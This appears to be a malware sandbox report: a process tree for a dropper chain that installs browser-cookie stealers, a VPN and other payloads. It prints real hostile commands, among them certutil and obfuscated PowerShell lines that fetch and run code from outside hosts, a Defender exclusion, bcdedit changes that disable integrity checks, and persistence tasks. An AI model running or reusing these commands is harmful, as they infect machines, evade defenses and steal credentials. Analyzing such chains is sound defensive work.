PID 2448 wrote to memory of 732	2448	prolab.exe	prolab.tmp
PID 3132 wrote to memory of 3168	3132	Setup.exe	cmd.exe
PID 3132 wrote to memory of 3168	3132	Setup.exe	cmd.exe
PID 3132 wrote to memory of 3168	3132	Setup.exe	cmd.exe
PID 3168 wrote to memory of 4048	3168	cmd.exe	taskkill.exe
PID 3168 wrote to memory of 4048	3168	cmd.exe	taskkill.exe
PID 3168 wrote to memory of 4048	3168	cmd.exe	taskkill.exe
PID 3168 wrote to memory of 2816	3168	cmd.exe	timeout.exe
PID 3168 wrote to memory of 2816	3168	cmd.exe	timeout.exe
PID 3168 wrote to memory of 2816	3168	cmd.exe	timeout.exe
PID 1780 wrote to memory of 13660	1780	ZHipigapybu.exe	cmd.exe
PID 1780 wrote to memory of 13660	1780	ZHipigapybu.exe	cmd.exe
PID 13660 wrote to memory of 15624	13660	cmd.exe	gaooo.exe
PID 13660 wrote to memory of 15624	13660	cmd.exe	gaooo.exe
PID 13660 wrote to memory of 15624	13660	cmd.exe	gaooo.exe
PID 15624 wrote to memory of 16316	15624	gaooo.exe	jfiag3g_gg.exe
PID 15624 wrote to memory of 16316	15624	gaooo.exe	jfiag3g_gg.exe
PID 15624 wrote to memory of 16316	15624	gaooo.exe	jfiag3g_gg.exe
PID 15624 wrote to memory of 7320	15624	gaooo.exe	jfiag3g_gg.exe
PID 15624 wrote to memory of 7320	15624	gaooo.exe	jfiag3g_gg.exe
PID 15624 wrote to memory of 7320	15624	gaooo.exe	jfiag3g_gg.exe
PID 3932 wrote to memory of 10556	3932	Setup.tmp	hjjgaa.exe
PID 3932 wrote to memory of 10556	3932	Setup.tmp	hjjgaa.exe
PID 3932 wrote to memory of 10556	3932	Setup.tmp	hjjgaa.exe
PID 10556 wrote to memory of 10696	10556	hjjgaa.exe	jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\Setup3310.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3920

C:\Users\Admin\AppData\Local\Temp\is-53CJI.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-53CJI.tmp\Setup3310.tmp" /SL5="$2011E,138429,56832,C:\Users\Admin\AppData\Local\Temp\Setup3310.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:848

C:\Users\Admin\AppData\Local\Temp\is-HAOUO.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-HAOUO.tmp\Setup.exe" /Verysilent
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2588

C:\Users\Admin\AppData\Local\Temp\is-DA5U8.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DA5U8.tmp\Setup.tmp" /SL5="$201EE,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-HAOUO.tmp\Setup.exe" /Verysilent
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3932

C:\Users\Admin\AppData\Local\Temp\is-QSU9L.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-QSU9L.tmp\Delta.exe" /Verysilent
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2712

C:\Users\Admin\AppData\Local\Temp\is-O3346.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-O3346.tmp\Delta.tmp" /SL5="$1025C,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-QSU9L.tmp\Delta.exe" /Verysilent
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:208

C:\Users\Admin\AppData\Local\Temp\is-36FN0.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-36FN0.tmp\Setup.exe" /VERYSILENT
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3132

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-36FN0.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
8⤵
- Suspicious use of WriteProcessMemory
PID:3168

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4048

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
9⤵
- Delays execution with timeout.exe
PID:2816

C:\Users\Admin\AppData\Local\Temp\is-QSU9L.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-QSU9L.tmp\PictureLAb.exe" /Verysilent
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1604

C:\Users\Admin\AppData\Local\Temp\is-ISIJ7.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-ISIJ7.tmp\PictureLAb.tmp" /SL5="$2025C,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-QSU9L.tmp\PictureLAb.exe" /Verysilent
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2376

C:\Users\Admin\AppData\Local\Temp\is-DTR21.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-DTR21.tmp\Setup.exe" /VERYSILENT
7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2696

C:\Users\Admin\AppData\Local\Temp\is-IKPJF.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-IKPJF.tmp\Setup.tmp" /SL5="$8006C,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-DTR21.tmp\Setup.exe" /VERYSILENT
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1568

C:\Users\Admin\AppData\Local\Temp\is-EHU2F.tmp\HGT.exe
"C:\Users\Admin\AppData\Local\Temp\is-EHU2F.tmp\HGT.exe" /S /UID=lab214
9⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2056

C:\Program Files\Java\OGMENEMCZI\prolab.exe
"C:\Program Files\Java\OGMENEMCZI\prolab.exe" /VERYSILENT
10⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2448

C:\Users\Admin\AppData\Local\Temp\is-0PL7O.tmp\prolab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-0PL7O.tmp\prolab.tmp" /SL5="$A003A,575243,216576,C:\Program Files\Java\OGMENEMCZI\prolab.exe" /VERYSILENT
11⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:732

C:\Users\Admin\AppData\Local\Temp\cc-f0b9c-db4-32e9f-3f9b438b3f1ab\ZHipigapybu.exe
"C:\Users\Admin\AppData\Local\Temp\cc-f0b9c-db4-32e9f-3f9b438b3f1ab\ZHipigapybu.exe"
10⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1780

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mrjlrkfi.hhd\gaooo.exe & exit
11⤵
- Suspicious use of WriteProcessMemory
PID:13660

C:\Users\Admin\AppData\Local\Temp\mrjlrkfi.hhd\gaooo.exe
C:\Users\Admin\AppData\Local\Temp\mrjlrkfi.hhd\gaooo.exe
12⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:15624

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
- Executes dropped EXE
PID:16316

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
13⤵
- Executes dropped EXE
PID:7320

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\04gvesug.cpj\md7_7dfj.exe & exit
11⤵
PID:5004

C:\Users\Admin\AppData\Local\Temp\04gvesug.cpj\md7_7dfj.exe
C:\Users\Admin\AppData\Local\Temp\04gvesug.cpj\md7_7dfj.exe
12⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:5196

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ej13il0b.uwn\askinstall29.exe & exit
11⤵
PID:8448

C:\Users\Admin\AppData\Local\Temp\ej13il0b.uwn\askinstall29.exe
C:\Users\Admin\AppData\Local\Temp\ej13il0b.uwn\askinstall29.exe
12⤵
- Executes dropped EXE
- Modifies system certificate store
PID:8568

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
13⤵
PID:10292

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
14⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10588

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2ewbz5pa.ga2\customer4.exe & exit
11⤵
PID:14836

C:\Users\Admin\AppData\Local\Temp\2ewbz5pa.ga2\customer4.exe
C:\Users\Admin\AppData\Local\Temp\2ewbz5pa.ga2\customer4.exe
12⤵
- Executes dropped EXE
PID:14948

C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"
13⤵
- Executes dropped EXE
- Loads dropped DLL
PID:15180

C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
parse.exe -f json -b firefox
14⤵
PID:18340

C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
parse.exe -f json -b edge
14⤵
PID:18380

C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
parse.exe -f json -b chrome
14⤵
PID:18352

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rsa4jsib.che\HookSetp.exe & exit
11⤵
PID:15408

C:\Users\Admin\AppData\Local\Temp\rsa4jsib.che\HookSetp.exe
C:\Users\Admin\AppData\Local\Temp\rsa4jsib.che\HookSetp.exe
12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1052

C:\ProgramData\4784775.52
"C:\ProgramData\4784775.52"
13⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:16120

C:\ProgramData\6727327.73
"C:\ProgramData\6727327.73"
13⤵
- Executes dropped EXE
- Adds Run key to start application
PID:16180

C:\ProgramData\Windows Host\Windows Host.exe
"C:\ProgramData\Windows Host\Windows Host.exe"
14⤵
- Executes dropped EXE
PID:16420

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a5xh0pwe.ghz\GcleanerWW.exe /mixone & exit
11⤵
PID:15720

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\42tpofvp.fjt\privacytools5.exe & exit
11⤵
PID:15888

C:\Users\Admin\AppData\Local\Temp\42tpofvp.fjt\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\42tpofvp.fjt\privacytools5.exe
12⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:15960

C:\Users\Admin\AppData\Local\Temp\42tpofvp.fjt\privacytools5.exe
C:\Users\Admin\AppData\Local\Temp\42tpofvp.fjt\privacytools5.exe
13⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:16340

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zommfzuf.pfu\setup.exe /8-2222 & exit
11⤵
PID:16820

C:\Users\Admin\AppData\Local\Temp\zommfzuf.pfu\setup.exe
C:\Users\Admin\AppData\Local\Temp\zommfzuf.pfu\setup.exe /8-2222
12⤵
- Executes dropped EXE
PID:16888

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Fragrant-Thunder"
13⤵
- Suspicious use of AdjustPrivilegeToken
PID:16952

C:\Program Files (x86)\Fragrant-Thunder\7za.exe
"C:\Program Files (x86)\Fragrant-Thunder\7za.exe" e -p154.61.71.51 winamp-plugins.7z
13⤵
PID:4248

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Fragrant-Thunder\setup.exe" -map "C:\Program Files (x86)\Fragrant-Thunder\WinmonProcessMonitor.sys""
13⤵
PID:5652

C:\Program Files (x86)\Fragrant-Thunder\setup.exe
"C:\Program Files (x86)\Fragrant-Thunder\setup.exe" -map "C:\Program Files (x86)\Fragrant-Thunder\WinmonProcessMonitor.sys"
14⤵
PID:5796

C:\Program Files (x86)\Fragrant-Thunder\7za.exe
"C:\Program Files (x86)\Fragrant-Thunder\7za.exe" e -p154.61.71.51 winamp.7z
13⤵
PID:6216

C:\Program Files (x86)\Fragrant-Thunder\setup.exe
"C:\Program Files (x86)\Fragrant-Thunder\setup.exe" /8-2222
13⤵
PID:6584

C:\Program Files (x86)\Fragrant-Thunder\setup.exe
"C:\Program Files (x86)\Fragrant-Thunder\setup.exe" /8-2222
14⤵
PID:9920

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
15⤵
PID:11192

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
16⤵
PID:11252

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /8-2222
15⤵
PID:11576

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
16⤵
- Creates scheduled task(s)
PID:2336

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
16⤵
- Creates scheduled task(s)
PID:12652

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
16⤵
PID:13000

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
17⤵
- Modifies boot configuration data using bcdedit
PID:14724

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
17⤵
- Modifies boot configuration data using bcdedit
PID:14592

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
17⤵
- Modifies boot configuration data using bcdedit
PID:14912

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
17⤵
- Modifies boot configuration data using bcdedit
PID:15020

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
17⤵
- Modifies boot configuration data using bcdedit
PID:8596

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
17⤵
- Modifies boot configuration data using bcdedit
PID:15076

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
17⤵
- Modifies boot configuration data using bcdedit
PID:15216

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
17⤵
- Modifies boot configuration data using bcdedit
PID:736

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
17⤵
- Modifies boot configuration data using bcdedit
PID:15348

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
17⤵
- Modifies boot configuration data using bcdedit
PID:15392

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
17⤵
- Modifies boot configuration data using bcdedit
PID:15504

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
17⤵
- Modifies boot configuration data using bcdedit
PID:15608

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
17⤵
- Modifies boot configuration data using bcdedit
PID:15684

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
17⤵
- Modifies boot configuration data using bcdedit
PID:15740

C:\Windows\System32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
16⤵
- Modifies boot configuration data using bcdedit
PID:15852

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
16⤵
PID:16680

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
16⤵
PID:10020

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
17⤵
PID:8708

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
18⤵
PID:10420

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h3tlfwkc.pd0\MultitimerFour.exe & exit
11⤵
PID:16940

C:\Users\Admin\AppData\Local\Temp\h3tlfwkc.pd0\MultitimerFour.exe
C:\Users\Admin\AppData\Local\Temp\h3tlfwkc.pd0\MultitimerFour.exe
12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:17068

C:\Users\Admin\AppData\Local\Temp\QYO07UJRN6\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\QYO07UJRN6\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
13⤵
- Executes dropped EXE
PID:17304

C:\Users\Admin\AppData\Local\Temp\QYO07UJRN6\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\QYO07UJRN6\multitimer.exe" 1 3.1616085473.605381e147101 104
14⤵
PID:18148

C:\Users\Admin\AppData\Local\Temp\QYO07UJRN6\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\QYO07UJRN6\multitimer.exe" 2 3.1616085473.605381e147101
15⤵
PID:18284

C:\Users\Admin\AppData\Local\Temp\1o0idmr54rx\l0isa2pqgkx.exe
"C:\Users\Admin\AppData\Local\Temp\1o0idmr54rx\l0isa2pqgkx.exe" /VERYSILENT
16⤵
PID:4524

C:\Users\Admin\AppData\Local\Temp\is-IAMQS.tmp\l0isa2pqgkx.tmp
"C:\Users\Admin\AppData\Local\Temp\is-IAMQS.tmp\l0isa2pqgkx.tmp" /SL5="$5014A,870426,780800,C:\Users\Admin\AppData\Local\Temp\1o0idmr54rx\l0isa2pqgkx.exe" /VERYSILENT
17⤵
PID:4688

C:\Users\Admin\AppData\Local\Temp\is-L23EQ.tmp\winlthst.exe
"C:\Users\Admin\AppData\Local\Temp\is-L23EQ.tmp\winlthst.exe" test1 test1
18⤵
PID:5160

C:\Users\Admin\AppData\Local\Temp\AiTcbAlcQ.exe
"C:\Users\Admin\AppData\Local\Temp\AiTcbAlcQ.exe"
19⤵
PID:6888

C:\Users\Admin\AppData\Local\Temp\AiTcbAlcQ.exe
"C:\Users\Admin\AppData\Local\Temp\AiTcbAlcQ.exe"
20⤵
PID:7256

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
19⤵
PID:17208

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
20⤵
PID:17320

C:\Users\Admin\AppData\Local\Temp\pg55w5sry0c\vict.exe
"C:\Users\Admin\AppData\Local\Temp\pg55w5sry0c\vict.exe" /VERYSILENT /id=535
16⤵
PID:4620

C:\Users\Admin\AppData\Local\Temp\is-JB1F3.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JB1F3.tmp\vict.tmp" /SL5="$401EE,870426,780800,C:\Users\Admin\AppData\Local\Temp\pg55w5sry0c\vict.exe" /VERYSILENT /id=535
17⤵
PID:4820

C:\Users\Admin\AppData\Local\Temp\is-7F09D.tmp\wimapi.exe
"C:\Users\Admin\AppData\Local\Temp\is-7F09D.tmp\wimapi.exe" 535
18⤵
PID:5168

C:\Users\Admin\AppData\Local\Temp\MqJQqhagK.exe
"C:\Users\Admin\AppData\Local\Temp\MqJQqhagK.exe"
19⤵
PID:6960

C:\Users\Admin\AppData\Local\Temp\MqJQqhagK.exe
"C:\Users\Admin\AppData\Local\Temp\MqJQqhagK.exe"
20⤵
PID:7288

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
19⤵
PID:17228

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
20⤵
PID:17372

C:\Users\Admin\AppData\Local\Temp\ltdn0535g4g\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\ltdn0535g4g\askinstall24.exe"
16⤵
PID:4600

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
17⤵
PID:5056

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
18⤵
- Kills process with taskkill
PID:5472

C:\Users\Admin\AppData\Local\Temp\m1zbmqkevdl\db14y2wcsj4.exe
"C:\Users\Admin\AppData\Local\Temp\m1zbmqkevdl\db14y2wcsj4.exe" /ustwo INSTALL
16⤵
PID:4592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 648
17⤵
- Program crash
PID:6740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 660
17⤵
- Program crash
PID:6816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 764
17⤵
- Program crash
PID:6900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 800
17⤵
- Program crash
PID:7108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 880
17⤵
- Program crash
PID:7216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 928
17⤵
- Program crash
PID:7972

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 1084
17⤵
- Program crash
PID:8076

C:\Users\Admin\AppData\Local\Temp\btkd1iwmgao\AwesomePoolU1.exe
"C:\Users\Admin\AppData\Local\Temp\btkd1iwmgao\AwesomePoolU1.exe"
16⤵
PID:4696

C:\Users\Admin\AppData\Local\Temp\e2rshz2rsph\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\e2rshz2rsph\vpn.exe" /silent /subid=482
16⤵
PID:4736

C:\Users\Admin\AppData\Local\Temp\is-9V5FH.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9V5FH.tmp\vpn.tmp" /SL5="$20370,15170975,270336,C:\Users\Admin\AppData\Local\Temp\e2rshz2rsph\vpn.exe" /silent /subid=482
17⤵
PID:4832

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
18⤵
PID:5992

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
19⤵
PID:6104

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
18⤵
PID:6940

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
19⤵
PID:7496

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
18⤵
PID:9056

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
18⤵
PID:9988

C:\Users\Admin\AppData\Local\Temp\2upvxsnyzss\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\2upvxsnyzss\Setup3310.exe" /Verysilent /subid=577
16⤵
PID:4584

C:\Users\Admin\AppData\Local\Temp\pxxy5yimbki\IBInstaller_97039.exe
"C:\Users\Admin\AppData\Local\Temp\pxxy5yimbki\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
16⤵
PID:5100

C:\Users\Admin\AppData\Local\Temp\is-H0HBE.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-H0HBE.tmp\IBInstaller_97039.tmp" /SL5="$104BC,14597143,721408,C:\Users\Admin\AppData\Local\Temp\pxxy5yimbki\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
17⤵
PID:4980

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://janiboots.store/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
18⤵
PID:5260

C:\Users\Admin\AppData\Local\Temp\is-BBES6.tmp\{app}\chrome_proxy.exe
"C:\Users\Admin\AppData\Local\Temp\is-BBES6.tmp\{app}\chrome_proxy.exe"
18⤵
PID:5272

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-BBES6.tmp\{app}\chrome_proxy.exe"
19⤵
PID:8988

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 4
20⤵
- Runs ping.exe
PID:9124

C:\Users\Admin\AppData\Local\Temp\0822L6JGME\setups.exe
"C:\Users\Admin\AppData\Local\Temp\0822L6JGME\setups.exe" ll
13⤵
PID:17332

C:\Users\Admin\AppData\Local\Temp\is-MJ9E7.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-MJ9E7.tmp\setups.tmp" /SL5="$402AA,549376,61440,C:\Users\Admin\AppData\Local\Temp\0822L6JGME\setups.exe" ll
14⤵
